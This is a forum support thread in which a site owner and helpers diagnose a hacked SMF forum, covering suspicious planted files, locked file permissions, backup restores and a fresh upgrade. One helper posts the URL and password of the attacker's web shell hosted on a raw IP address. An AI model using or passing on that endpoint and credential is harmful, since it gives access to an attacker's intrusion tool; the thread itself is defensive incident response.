Site is being hacked as we speak

Kimmie · November 30, 2013, 12:22:23 AM

Here is his post and it shows his IP address that he used

Link to google news about this jerkoff!!

http://news.google.com/newspapers?nid=1291&dat=19860331&id=YQtUAAAAIBAJ&sjid=kowDAAAAIBAJ&pg=4187,11416642

Arantor · November 30, 2013, 12:25:46 AM

Did your host ever come up with any information?

* Arantor Beeblebrox the First wonders if there is something deeper going on... like permissions not properly configured on files.

Kimmie · November 30, 2013, 12:36:44 AM

No. And I even talked to them as late as yesterday morning. There is a huge vulnerability somewhere and we gotta find it. I can't keep going through this. I have even changed all my pw's twice since the last time I talked to you folks here

Arantor · November 30, 2013, 12:39:07 AM

Did you put up clean files like we suggested?

Any themes that shouldn't be there?

Kimmie · November 30, 2013, 12:49:57 AM

I used a backup from almost 1 month prior to it happening before. All themes are the ones I have had. I threw my site into maintenance mode but CPanel will not let me import the backup. File is too big. I was told to use bigdump but I have never used it before. On this part here.. do I leave this as local host or do I change it to the server ip?

Kimmie · November 30, 2013, 12:57:03 AM

Sources Folder: Ajax.php
PublicHtml Folder: .config.php3

These files are showing as having being updated at 8pm tonight which was right after I was on the site last and is probably when he did it. Can you look at it and see if you see anything suspicious?

Kimmie · November 30, 2013, 12:57:36 AM

Had to put this one as sep reply

Arantor · November 30, 2013, 01:01:47 AM

Yes, both of those are suspicious files.

That tells me file permissions weren't set up properly allowing for files to be written to your website from somewhere else (ask your host, they should have logs)

But as we warned you, there was no guarantee the backup would be clean. It's entirely possible that the backup was already previously compromised somehow (e.g. bad file permissions)

Kimmie · November 30, 2013, 01:14:22 AM

Yes but according to my host the files in the backup they used had not been modified in any way so I chose to leave it like that. Only problem with file permissions as I stated before is I have no control over those. I tried changing them then but the changes would not take.

Kimmie · November 30, 2013, 01:15:43 AM

If you can list for me what they are supposed to be, I can not only see if they can give me access to change them (every other host I have used I had that permission, with them I don't), but I can also see which ones need to be changed.

Arantor · November 30, 2013, 01:18:30 AM

Why do you not have control! This sounds like a recipe for disaster, and almost certainly contributed to being hacked.

Kimmie · November 30, 2013, 01:28:09 AM

I had it originally when I first put my site on this host 2years ago. They since changed that but I plan on making them give those permissions back to me once they finally contact me. They are 5-6 hours ahead of me time wise so it will be a few hours before they even see my ticket.

I am currently trying to upload a backup via cpanel/backups option so hopefully this will work for now

Colin · November 30, 2013, 02:16:29 AM

Does this email address ring a bell?

[email protected]

Colin · November 30, 2013, 02:42:22 AM

Here is what he is seeing.

Now you have my attention. Anyone who wants to have a look at this little tool he is using

http://192.241.210.14/ajax.php

He likes to use the password: 484654

Kimmie · November 30, 2013, 03:37:58 AM

Quote from: Colin on November 30, 2013, 02:16:29 AM
Does this email address ring a bell?

[email protected]

No I have never seen that one before

This has been sitting here for 2 hours now. Any idea how long this is supposed to take :/ (uploading backup using CPanel/backups/Restore

Colin · November 30, 2013, 03:42:20 AM

How big is your backup?
---------------------------

LOL this guy removed the credit for the person who actually built this web shell script. Go figure a hacker that won't credit a fellow hacker.

It looks like it is Web Shell by oRb that he is using.

Kimmie · November 30, 2013, 03:44:32 AM

gzipped its 84.1MB

Colin · November 30, 2013, 03:54:41 AM

No that should take only a couple of minutes. Try restarting that and trying it again.

Kimmie · November 30, 2013, 10:29:43 AM

Ended up falling asleep since it was so late. Let it sit all night and it didn't work. Going to try it again here in just a few minutes. Before I do that, I think I am going to use the large upgrade so I can have all new files but I want to make sure I do this right first. I am following this so I assume it is still accurate and up to date

http://wiki.simplemachines.org/smf/Upgrading#Extract_the_SMF_archive_and_upload_the_files_to_your_website

1. I need to delete publichtml folder. ----- is there any other files I need to delete? If I have the large upgrade extracted on my pc I can go by that right?

2. Once those are deleted, I highlight all upgrade files and upload. This will put them in their respective places

3. CHmod files (if I can - still have not heard from host). using this to go by
http://wiki.simplemachines.org/smf/Chmod

4. Run upgrade tool (point my browser to it). Once complete tell it to remove those files

kat · November 30, 2013, 10:37:28 AM

If your forum's on SMF v2.0.6, you've no need to do step four.

http://wiki.simplemachines.org/smf/How_to_upload_a_fresh_set_of_files

News:

Site is being hacked as we speak

kat